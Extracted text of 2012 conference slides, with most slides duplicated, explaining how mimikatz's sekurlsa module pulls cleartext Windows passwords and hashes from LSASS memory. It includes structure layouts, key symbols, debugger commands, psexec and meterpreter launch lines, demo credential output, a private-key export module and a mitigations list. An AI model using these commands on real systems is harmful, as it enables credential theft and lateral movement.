07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
